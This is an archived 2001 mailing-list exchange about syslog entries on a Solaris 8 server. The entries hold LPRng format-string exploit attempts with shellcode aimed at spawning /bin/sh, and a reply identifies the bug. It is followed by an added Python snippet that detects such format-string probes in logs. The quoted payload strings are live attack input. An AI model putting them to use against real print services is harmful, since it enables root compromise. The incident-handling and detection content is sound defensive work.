Security Incidents mailing list archives

RE: solaris hack info required


From: "Ivy Lane" <ivylane24 () hotmail com>
Date: Fri, 29 Jun 2001 13:22:48 -0400


This is called "trying to use LPR's logging function" to get a shell.
This is the LPRng string format _syslog bug that theoretically could allow root access.
Read this:
http://www.securityfocus.com/vdb/bottom.html?vid=1712

Solaris 8 is not listed as vulnerable.

Give the man a peanut!


IN RESPONSE TO:
*******************************************
Hi,

Any help you can give me would be appreciated.

I've a Sun Netra X1 (Solaris 8) with a /var/adm/messages file full of these
messages at frequent but irregular intervals (approx every 5-10 seconds for
several hours).

Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13277]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBB()*+XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.
192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13278]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.167u%301$nsecurity.i%302$n
%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13279]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.136u%300$n%.41u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:04 jim bsd-gw[13280]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.192u%303
$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh

Do any of you recognise this? If so, what should I be looking for to see if
the hack was successful?

TIA,
Mark



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:

http://aris.securityfocus.com
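
An added example, not part of the original post or of any tool named in it: one way to triage a `messages` file for entries like the ones quoted above. It rejoins hard-wrapped records and flags any record containing printf write directives such as `%300$n`. The function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Start of a syslog record: "Mon DD HH:MM:SS host tag[pid]: "
RECORD_START = re.compile(
    r"^([A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) (\S+) ([\w.-]+)\[(\d+)\]: ")
# printf write directives: %n, %hn, %hhn, %ln and positional forms like %300$n
WRITE_DIRECTIVE = re.compile(r"%(?:\d+\$)?(?:hh|h|l|ll)?n")

def join_wrapped(lines):
    """Rejoin records that a mail client or pager hard-wrapped across lines."""
    records = []
    for line in lines:
        line = line.rstrip("\n")
        if RECORD_START.match(line) or not records:
            records.append(line)      # a new record begins here
        else:
            records[-1] += line       # continuation of the previous record
    return records

def find_format_string_probes(lines):
    """Return (timestamp, host, pid, write_directive_count, has_shell_path)
    for every record whose message carries a printf write directive."""
    hits = []
    for rec in join_wrapped(lines):
        m = RECORD_START.match(rec)
        if not m:
            continue
        body = rec[m.end():]
        writes = WRITE_DIRECTIVE.findall(body)
        if writes:
            hits.append((m.group(1), m.group(2), int(m.group(4)),
                         len(writes), "/bin/sh" in body))
    return hits

# Constructed sample modelled on the lines in the post (payload shortened),
# followed by two benign records that must not be flagged.
SAMPLE = """\
Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%30
3$nAAAA/bin/sh
Jun 24 03:44:10 jim bsd-gw[13290]: [ID 315218 lpr.error] Invalid protocol request (12): hello
Jun 24 03:45:00 jim sendmail[402]: [ID 801593 mail.info] 100% delivered, no errors
""".splitlines()

if __name__ == "__main__":
    for hit in find_format_string_probes(SAMPLE):
        print(hit)
```

A hit shows only that such a request reached the daemon and was logged; it says nothing on its own about whether the attempt succeeded.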
